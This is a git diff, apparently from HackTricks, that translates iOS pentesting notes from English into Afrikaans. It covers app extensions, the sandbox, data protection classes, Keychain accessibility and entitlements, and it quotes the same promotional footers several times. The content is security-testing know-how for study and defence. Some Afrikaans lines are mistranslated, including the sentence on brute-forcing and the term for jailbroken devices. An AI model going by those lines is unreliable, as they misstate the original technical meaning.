Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
-App extensions enhance the functionality of apps by allowing them to interact with other apps or the system, providing custom features or content. These extensions include: +App-uitbreidings verbeter die funksionaliteit van programme deur hulle in staat te stel om met ander programme of die stelsel te kommunikeer en aangepaste funksies of inhoud te bied. Hierdie uitbreidings sluit in: -- **Custom Keyboard**: Offers a unique keyboard across all apps, replacing the default iOS keyboard. -- **Share**: Enables sharing to social networks or with others directly. -- **Today (Widgets)**: Delivers content or performs tasks quickly from the Notification Center's Today view. +- **Aangepaste Sleutelbord**: Bied 'n unieke sleutelbord in alle programme, wat die verstek iOS-sleutelbord vervang. +- **Deel**: Maak dit moontlik om te deel na sosiale netwerke of direk met ander. +- **Vandag (Widgets)**: Lees inhoud of voer vinnige take uit vanuit die Vandag-aansig van die Kennisgewingsentrum. -When a user engages with these extensions, such as sharing text from a host app, the extension processes this input within its context, leveraging the shared information to perform its task, as detailed in Apple's documentation. +Wanneer 'n gebruiker met hierdie uitbreidings interaksie aangaan, soos om teks van 'n gasheerprogram te deel, verwerk die uitbreiding hierdie inset binne sy konteks en maak gebruik van die gedeelde inligting om sy taak uit te voer, soos beskryf in Apple se dokumentasie. -### **Security Considerations** +### **Sekuriteits-oorwegings** -Key security aspects include: +Belangrike sekuriteitsaspekte sluit in: -- Extensions and their containing apps communicate via inter-process communication, not directly. -- The **Today widget** is unique in that it can request its app to open via a specific method. -- Shared data access is allowed within a private container, but direct access is restricted. -- Certain APIs, including HealthKit, are off-limits to app extensions, which also cannot start long-running tasks, access the camera, or microphone, except for iMessage extensions. +- Uitbreidings en hul bevatte programme kommunikeer via interproseskommunikasie, nie direk nie. +- Die **Vandag-widget** is uniek in die sin dat dit sy program kan versoek om oop te maak deur middel van 'n spesifieke metode. +- Gedeelde data-toegang word toegelaat binne 'n private houer, maar direkte toegang is beperk. +- Sekere API's, insluitend HealthKit, is verbode vir app-uitbreidings, wat ook nie langdurige take kan begin nie, die kamera of mikrofoon kan gebruik nie, behalwe vir iMessage-uitbreidings nie. -### Static Analysis +### Statische Analise -#### **Identifying App Extensions** +#### **Identifisering van App-uitbreidings** -To find app extensions in source code, search for `NSExtensionPointIdentifier` in Xcode or inspect the app bundle for `.appex` files indicating extensions. Without source code, use grep or SSH to locate these identifiers within the app bundle. +Om app-uitbreidings in bronkode te vind, soek na `NSExtensionPointIdentifier` in Xcode of ondersoek die app-bundel vir `.appex`-lêers wat uitbreidings aandui. Sonder bronkode, gebruik grep of SSH om hierdie identifiseerders binne die app-bundel op te spoor. -#### **Supported Data Types** +#### **Ondersteunde Data Tipes** -Check the `Info.plist` file of an extension for `NSExtensionActivationRule` to identify supported data types. This setup ensures only compatible data types trigger the extension in host apps. +Kyk na die `Info.plist`-lêer van 'n uitbreiding vir `NSExtensionActivationRule` om ondersteunde data tipes te identifiseer. Hierdie opset verseker dat slegs verenigbare data tipes die uitbreiding in gasheerprogramme aktiveer. -#### **Data Sharing** +#### **Data Deling** -Data sharing between an app and its extension requires a shared container, set up via "App Groups" and accessed through `NSUserDefaults`. This shared space is necessary for background transfers initiated by extensions. +Data deling tussen 'n program en sy uitbreiding vereis 'n gedeelde houer wat opgestel word deur middel van "App Groups" en toegang verkry deur middel van `NSUserDefaults`. Hierdie gedeelde ruimte is noodsaaklik vir agtergrondoorplasings wat deur uitbreidings geïnisieer word. -#### **Restricting Extensions** +#### **Beperking van Uitbreidings** -Apps can restrict certain extension types, particularly custom keyboards, ensuring sensitive data handling aligns with security protocols. +Apps kan sekere uitbreidingstipes beperk, veral aangepaste sleutelborde, om te verseker dat die hantering van sensitiewe data ooreenstem met sekuriteitsprotokolle. -### Dynamic Analysis +### Dinamiese Analise -Dynamic analysis involves: +Dinamiese analise behels: -- **Inspecting Shared Items**: Hook into `NSExtensionContext - inputItems` to see shared data types and origins. -- **Identifying Extensions**: Discover which extensions process your data by observing internal mechanisms, like `NSXPCConnection`. +- **Ondersoek van Gedeelde Items**: Koppel aan `NSExtensionContext - inputItems` om gedeelde data tipes en oorsprong te sien. +- **Identifisering van Uitbreidings**: Ontdek watter uitbreidings jou data verwerk deur interne meganismes, soos `NSXPCConnection`, waar te neem. -Tools like `frida-trace` can aid in understanding the underlying processes, especially for those interested in the technical details of inter-process communication. +Hulpmiddels soos `frida-trace` kan help om die onderliggende prosesse te verstaan, veral vir diegene wat belangstel in die tegniese besonderhede van interproseskommunikasie. -## References +## Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/](https://mas.owasp.org/MASTG/iOS/0x06h-Testing-Platform-Interaction/) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0072/)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
diff --git a/mobile-pentesting/ios-pentesting/ios-basics.md b/mobile-pentesting/ios-pentesting/ios-basics.md index 6552be9b3..a050252ee 100644 --- a/mobile-pentesting/ios-pentesting/ios-basics.md +++ b/mobile-pentesting/ios-pentesting/ios-basics.md @@ -1,42 +1,39 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
-# Privilege Separation and Sandbox +# Privilege Separation en Sandboks -In iOS, a distinction in privilege exists between the user-accessible applications and the system's core processes. Applications run under the **`mobile`** user identity, while the crucial system processes operate as **`root`**. This separation is enhanced by a sandbox mechanism, which imposes strict limitations on what actions applications can undertake. For instance, even if applications share the same user identity, they are prohibited from accessing or modifying each other's data. +In iOS bestaan daar 'n onderskeid in voorreg tussen die gebruikerstoeganklike programme en die kernprosesse van die stelsel. Programme loop onder die **`mobile`**-gebruikersidentiteit, terwyl die kritieke stelselprosesse as **`root`** werk. Hierdie skeiding word versterk deur 'n sandboks-meganisme wat streng beperkings plaas op die aksies wat programme kan onderneem. Byvoorbeeld, selfs al deel programme dieselfde gebruikersidentiteit, word hulle verbied om toegang tot of wysiging van mekaar se data te verkry. -Applications are installed in a specific directory (`private/var/mobile/Applications/{random ID}`) and have restricted read access to certain system areas and functionalities, such as SMS and phone calls. Access to protected areas triggers a pop-up request for user permission. +Programme word geïnstalleer in 'n spesifieke gids (`private/var/mobile/Applications/{willekeurige ID}`) en het beperkte leestoegang tot sekere stelselareas en -funksies, soos SMS'e en telefoonoproepe. Toegang tot beskermde areas veroorsaak 'n pop-upversoek vir gebruikerstoestemming. -# Data Protection +# Data Beskerming -iOS offers developers the **Data Protection APIs**, built atop the Secure Enclave Processor (SEP) — a dedicated coprocessor for cryptographic operations and key management. The SEP ensures data protection integrity via a unique device-specific key, the device UID, embedded within it. +iOS bied ontwikkelaars die **Data Protection APIs** aan, gebou op die Secure Enclave Processor (SEP) - 'n toegewyde koprotsessor vir kriptografiese operasies en sleutelbestuur. Die SEP verseker data-beskermingsintegriteit deur middel van 'n unieke toestelspesifieke sleutel, die toestel UID, wat daarin ingebed is. -Upon file creation, a unique 256-bit AES encryption key is generated, encrypting the file's content. This encryption key, alongside a class ID, is then encrypted using a class key and stored within the file's metadata. Decrypting a file involves using the system's key to access the metadata, retrieving the class key with the class ID, and then decrypting the file's unique encryption key. +By die skep van 'n lêer word 'n unieke 256-bit AES-kripteringssleutel gegenereer wat die inhoud van die lêer kripteer. Hierdie kripteringssleutel, tesame met 'n klas-ID, word dan gekripteer met behulp van 'n klasleutel en binne die lêer se metadata gestoor. Die ontkriptering van 'n lêer behels die gebruik van die stelsel se sleutel om toegang tot die metadata te verkry, die klasleutel met die klas-ID te herwin, en dan die unieke kripteringssleutel van die lêer te ontkripteer. -iOS defines **four protection classes** for data security, which determine when and how data can be accessed: +iOS definieer **vier beskermingsklasse** vir data-sekuriteit wat bepaal wanneer en hoe data toeganklik is: -- **Complete Protection (NSFileProtectionComplete)**: Data is inaccessible until the device is unlocked using the user's passcode. -- **Protected Unless Open (NSFileProtectionCompleteUnlessOpen)**: Allows file access even after the device is locked, provided the file was opened when the device was unlocked. -- **Protected Until First User Authentication (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data is accessible after the first user unlock post-boot, remaining accessible even if the device is locked again. -- **No Protection (NSFileProtectionNone)**: Data is only protected by the device UID, facilitating quick remote data wiping. +- **Volledige Beskerming (NSFileProtectionComplete)**: Data is ontoeganklik totdat die toestel ontgrendel word met die gebruiker se wagwoord. +- **Beskerm, tensy Oop (NSFileProtectionCompleteUnlessOpen)**: Maak lêertoegang moontlik selfs nadat die toestel gesluit is, op voorwaarde dat die lêer geopen is toe die toestel ontgrendel was. +- **Beskerm tot Eerste Gebruikersverifikasie (NSFileProtectionCompleteUntilFirstUserAuthentication)**: Data is toeganklik na die eerste gebruikersontsluiting na opstart, en bly toeganklik selfs as die toestel weer gesluit word. +- **Geen Beskerming (NSFileProtectionNone)**: Data word slegs beskerm deur die toestel UID, wat vinnige verwydering van data op afstand fasiliteer. -The encryption of all classes, except for `NSFileProtectionNone`, involves a key derived from both the device UID and the user's passcode, ensuring decryption is only possible on the device with the correct passcode. From iOS 7 onwards, the default protection class is "Protected Until First User Authentication". - -Developers can use [**FileDP**](https://github.com/abjurato/FileDp-Source), a tool for inspecting the data protection class of files on an iPhone. +Die kriptering van alle klasse, behalwe `NSFileProtectionNone`, behels 'n sleutel wat afgelei word van sowel die toestel UID as die gebruiker se wagwoord, om te verseker dat ontkriptering slegs moontlik is op die toestel met die korrekte wagwoord. Vanaf iOS 7 is die verstek beskermingsklas "Beskerm tot Eerste Gebruikersverifikasie". +Ontwikkelaars kan [**FileDP**](https://github.com/abjurato/FileDp-Source) gebruik, 'n instrument om die data-beskermingsklas van lêers op 'n iPhone te ondersoek. ```python # Example code to use FileDP for checking file protection class # Note: Ensure your device is jailbroken and has Python installed to use FileDP. @@ -45,105 +42,98 @@ git clone https://github.com/abjurato/FileDp-Source cd FileDp-Source python filedp.py /path/to/check ``` +## **Die Sleutelbos** -## **The Keychain** +In iOS dien 'n **Sleutelbos** as 'n veilige **versleutelde houer** vir die stoor van **sensitiewe inligting**, wat slegs toeganklik is deur die toepassing wat dit gestoor het of deur diegene wat uitdruklik gemagtig is. Hierdie versleuteling word versterk deur 'n unieke **wagwoord wat deur iOS gegenereer word**, wat self versleutel is met **AES**. Hierdie versleutelingsproses maak gebruik van 'n **PBKDF2-funksie**, wat die gebruiker se wagwoord kombineer met 'n sout wat afgelei is van die toestel se **UID**, 'n komponent wat slegs die **veilige enclave chipset** kan bereik. Gevolglik bly die inhoud van die Sleutelbos ontoeganklik op enige toestel anders as die een waar dit oorspronklik versleutel is, selfs as die gebruiker se wagwoord bekend is. -In iOS, a **Keychain** serves as a secure **encrypted container** for storing **sensitive information**, accessible only by the application that stored it or those explicitly authorized. This encryption is fortified by a unique **password generated by iOS**, which itself is encrypted with **AES**. This encryption process leverages a **PBKDF2 function**, combining the user's passcode with a salt derived from the device's **UID**, a component only the **secure enclave chipset** can access. Consequently, even if the user's passcode is known, the Keychain contents remain inaccessible on any device other than the one where they were originally encrypted. +**Bestuur en toegang** tot die Sleutelbosdata word hanteer deur die **`securityd` daemon**, gebaseer op spesifieke toepassingsbevoegdhede soos `Keychain-access-groups` en `application-identifier`. -**Management and access** to the Keychain data are handled by the **`securityd` daemon**, based on specific app entitlements like `Keychain-access-groups` and `application-identifier`. +### **Sleutelbos API-operasies** -### **Keychain API Operations** +Die Sleutelbos API, in detail beskryf in [Apple se Sleutelbosdiensdokumentasie](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), bied essensiële funksies vir die bestuur van veilige stoor: -The Keychain API, detailed at [Apple's Keychain Services documentation](https://developer.apple.com/library/content/documentation/Security/Conceptual/keychainServConcepts/02concepts/concepts.html), provides essential functions for secure storage management: +- **`SecItemAdd`**: Voeg 'n nuwe item by die Sleutelbos. +- **`SecItemUpdate`**: Werk 'n bestaande item in die Sleutelbos by. +- **`SecItemCopyMatching`**: Haal 'n item uit die Sleutelbos op. +- **`SecItemDelete`**: Verwyder 'n item uit die Sleutelbos. -- **`SecItemAdd`**: Adds a new item to the Keychain. -- **`SecItemUpdate`**: Updates an existing item in the Keychain. -- **`SecItemCopyMatching`**: Retrieves an item from the Keychain. -- **`SecItemDelete`**: Removes an item from the Keychain. +Die kragtige krag van die Sleutelbos wagwoord behels óf die aanval op die versleutelde sleutel self of die poging om die wagwoord op die toestel self te raai, wat aansienlik bemoeilik word deur die veilige enclave se afdwinging van 'n vertraging tussen mislukte pogings. -Brute-forcing the Keychain password involves either attacking the encrypted key directly or attempting to guess the passcode on the device itself, hindered significantly by secure enclave's enforcement of a delay between failed attempts. +### **Konfigurering van Sleutelbositemdata-beskerming** -### **Configuring Keychain Item Data Protection** +Data-beskermingsvlakke vir Sleutelbositems word ingestel deur die `kSecAttrAccessible` eienskap tydens die skep of opdateer van 'n item. Hierdie vlakke, [soos deur Apple gespesifiseer](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), bepaal wanneer en hoe Sleutelbositems toeganklik is: -Data protection levels for Keychain items are set using the `kSecAttrAccessible` attribute during item creation or update. These levels, [as specified by Apple](https://developer.apple.com/documentation/security/keychain_services/keychain_items/item_attribute_keys_and_values#1679100), determine when and how Keychain items are accessible: +- **`kSecAttrAccessibleAlways`**: Altyd toeganklik, ongeag die toestel se sluitstatus. +- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Altyd toeganklik, maar nie ingesluit in rugsteun nie. +- **`kSecAttrAccessibleAfterFirstUnlock`**: Toeganklik na die eerste ontgrendeling na herlaai. +- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Dieselfde as bogenoemde, maar nie oordraagbaar na nuwe toestelle nie. +- **`kSecAttrAccessibleWhenUnlocked`**: Slegs toeganklik wanneer die toestel ontgrendel is. +- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Toeganklik wanneer ontgrendel, nie ingesluit in rugsteun nie. +- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Vereis toestel wagwoord, nie ingesluit in rugsteun nie. -- **`kSecAttrAccessibleAlways`**: Accessible anytime, regardless of device lock status. -- **`kSecAttrAccessibleAlwaysThisDeviceOnly`**: Always accessible, but not included in backups. -- **`kSecAttrAccessibleAfterFirstUnlock`**: Accessible after the first unlock post-restart. -- **`kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly`**: Same as above, but not transferable to new devices. -- **`kSecAttrAccessibleWhenUnlocked`**: Only accessible when the device is unlocked. -- **`kSecAttrAccessibleWhenUnlockedThisDeviceOnly`**: Accessible when unlocked, not included in backups. -- **`kSecAttrAccessibleWhenPasscodeSetThisDeviceOnly`**: Requires device passcode, not included in backups. +**`AccessControlFlags`** verfyn verdere toegangsmetodes, wat biometriese verifikasie of wagwoordgebruik moontlik maak. -**`AccessControlFlags`** further refine access methods, allowing for biometric authentication or passcode use. - -### **Jailbroken Devices Warning** +### **Waarskuwing vir Gehackte Toestelle** {% hint style="warning" %} -On **jailbroken devices**, the Keychain's protections are compromised, posing a significant security risk. +Op **gehackte toestelle** is die beskerming van die Sleutelbos gekompromitteer, wat 'n aansienlike veiligheidsrisiko inhou. {% endhint %} -### **Persistence of Keychain Data** - -Unlike app-specific data deleted upon app uninstallation, **Keychain data persists** on the device. This characteristic could enable new owners of a second-hand device to access the previous owner's application data simply by reinstalling apps. Developers are advised to proactively clear Keychain data upon app installation or during logout to mitigate this risk. Here's a Swift code example demonstrating how to clear Keychain data upon the first app launch: +### **Volharding van Sleutelbosdata** +In teenstelling met toepassingsspesifieke data wat uitgevee word wanneer die toepassing gedeïnstalleer word, **volhard Sleutelbosdata** op die toestel. Hierdie kenmerk kan nuwe eienaars van 'n tweedehandse toestel in staat stel om die vorige eienaar se toepassingsdata toeganklik te maak deur eenvoudigweg die toepassings te herinstalleer. Ontwikkelaars word aangeraai om proaktief Sleutelbosdata uit te wis by die installering van die toepassing of tydens afmelding om hierdie risiko te verminder. Hier is 'n voorbeeld van Swift-kode wat demonstreer hoe om Sleutelbosdata uit te wis by die eerste aanvang van die toepassing: ```swift let userDefaults = UserDefaults.standard if userDefaults.bool(forKey: "hasRunBefore") == false { - // Remove Keychain items here +// Remove Keychain items here - // Update the flag indicator - userDefaults.set(true, forKey: "hasRunBefore") - userDefaults.synchronize() // Forces the app to update UserDefaults +// Update the flag indicator +userDefaults.set(true, forKey: "hasRunBefore") +userDefaults.synchronize() // Forces the app to update UserDefaults } ``` +# **App-vermoëns** -# **App Capabilities** +In die wêreld van app-ontwikkeling speel **sandboxing** 'n belangrike rol in die verbetering van sekuriteit. Hierdie proses verseker dat elke app binne sy eie unieke tuisgids werk, en voorkom dus dat dit toegang tot stelsel lêers of data van ander apps verkry. Die afdwinging van hierdie beperkings word gedoen deur middel van sandbox-beleide, wat deel vorm van die **Trusted BSD (MAC) Mandatory Access Control Framework**. -In the realm of app development, **sandboxing** plays a crucial role in enhancing security. This process ensures that each app operates within its own unique home directory, thus preventing it from accessing system files or data belonging to other apps. The enforcement of these restrictions is carried out through sandbox policies, which are a part of the **Trusted BSD (MAC) Mandatory Access Control Framework**. +Ontwikkelaars het die vermoë om sekere **vermoëns of toestemmings** vir hul apps te konfigureer, soos **Data Protection** of **Keychain Sharing**. Hierdie toestemmings word onmiddellik toegepas nadat die app geïnstalleer is. Nietemin, om toegang tot sekere beskermde hulpbronne te verkry, moet die app uitdruklike toestemming van die gebruiker kry tydens die eerste poging. Dit word bereik deur die gebruik van _doelstrengs_ of _gebruiksbeskrywingsstrengs_, wat aan gebruikers in 'n toestemmingsversoekwaarskuwing voorgelê word. -Developers have the ability to configure certain **capabilities or permissions** for their apps, such as **Data Protection** or **Keychain Sharing**. These permissions are applied immediately after the app is installed. Nonetheless, for accessing certain protected resources, the app must obtain explicit consent from the user at the time of the first attempt. This is achieved through the use of _purpose strings_ or _usage description strings_, which are presented to users in a permission request alert. +Vir diegene wat toegang tot die bronkode het, kan verifikasie van toestemmings wat in die `Info.plist`-lêer ingesluit is, gedoen word deur: -For those with access to the source code, verification of permissions included in the `Info.plist` file can be done by: +1. Die projek in Xcode oop te maak. +2. Die `Info.plist`-lêer op te spoor en oop te maak. +3. Soek na sleutels met die voorvoegsel `"Privacy -"`, met die opsie om rou sleutels/waardes vir duidelikheid te vertoon. -1. Opening the project in Xcode. -2. Locating and opening the `Info.plist` file. -3. Searching for keys prefixed with `"Privacy -"`, with the option to view raw keys/values for clarity. +Wanneer 'n IPA-lêer hanteer word, kan die volgende stappe gevolg word: -When dealing with an IPA file, the following steps can be followed: - -1. Unzip the IPA. -2. Locate the `Info.plist` file within `Payload/.app/`. -3. Convert the file to XML format if necessary, for easier inspection. - -For example, the purpose strings in the `Info.plist` file might look like this: +1. Die IPA-lêer uitpak. +2. Die `Info.plist`-lêer binne `Payload/.app/` opspoor. +3. Die lêer na XML-formaat omskakel indien nodig, vir makliker inspeksie. +Byvoorbeeld, die doelstrengs in die `Info.plist`-lêer kan so lyk: ```xml - NSLocationWhenInUseUsageDescription - Your location is used to provide turn-by-turn directions to your destination. +NSLocationWhenInUseUsageDescription +Your location is used to provide turn-by-turn directions to your destination. ``` - -## Device Capabilities -The `Info.plist` file of an app specifies **device capabilities** that help the App Store filter apps for device compatibility. These are defined under the **`UIRequiredDeviceCapabilities`** key. For instance: - +## Toestelvermoëns +Die `Info.plist` lêer van 'n app spesifiseer **toestelvermoëns** wat help om die App Store te gebruik om apps te filter vir toestelverenigbaarheid. Hierdie vermoëns word gedefinieer onder die **`UIRequiredDeviceCapabilities`** sleutel. Byvoorbeeld: ```xml UIRequiredDeviceCapabilities - armv7 +armv7 ``` +Hierdie voorbeeld dui daarop dat die app versoenbaar is met die armv7 instruksiestel. Ontwikkelaars kan ook funksies soos nfc spesifiseer om te verseker dat hul app slegs beskikbaar is vir toestelle wat NFC ondersteun. -This example indicates that the app is compatible with the armv7 instruction set. Developers may also specify capabilities like nfc to ensure their app is only available to devices supporting NFC. +## Toekennings -## Entitlements - -**Entitlements** are another critical aspect of iOS app development, serving as key-value pairs that grant apps permission to perform certain operations beyond runtime checks. For example, enabling **Data Protection** in an app involves adding a specific entitlement in the Xcode project, which is then reflected in the app's entitlements file or the embedded mobile provision file for IPAs. +**Toekennings** is 'n ander kritieke aspek van iOS-app-ontwikkeling, wat dien as sleutel-waardepare wat apps toestemming gee om sekere handelinge uit te voer buite die uitvoeringstyd kontroles. Byvoorbeeld, om **Data Protection** in 'n app te aktiveer, moet 'n spesifieke toekenning by die Xcode-projek gevoeg word, wat dan weerspieël word in die app se toekenningslêer of die ingebedde mobiele voorsieningslêer vir IPAs. -# References +# Verwysings * [https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage](https://mas.owasp.org/MASTG/iOS/0x06d-Testing-Data-Storage) * [https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md](https://github.com/OWASP/owasp-mastg/blob/master/Document/0x06h-Testing-Platform-Interaction.md) * [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/) @@ -153,16 +143,14 @@ This example indicates that the app is compatible with the armv7 instruction set
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md index 3041d2566..577d816ef 100644 --- a/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md +++ b/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md @@ -1,79 +1,72 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
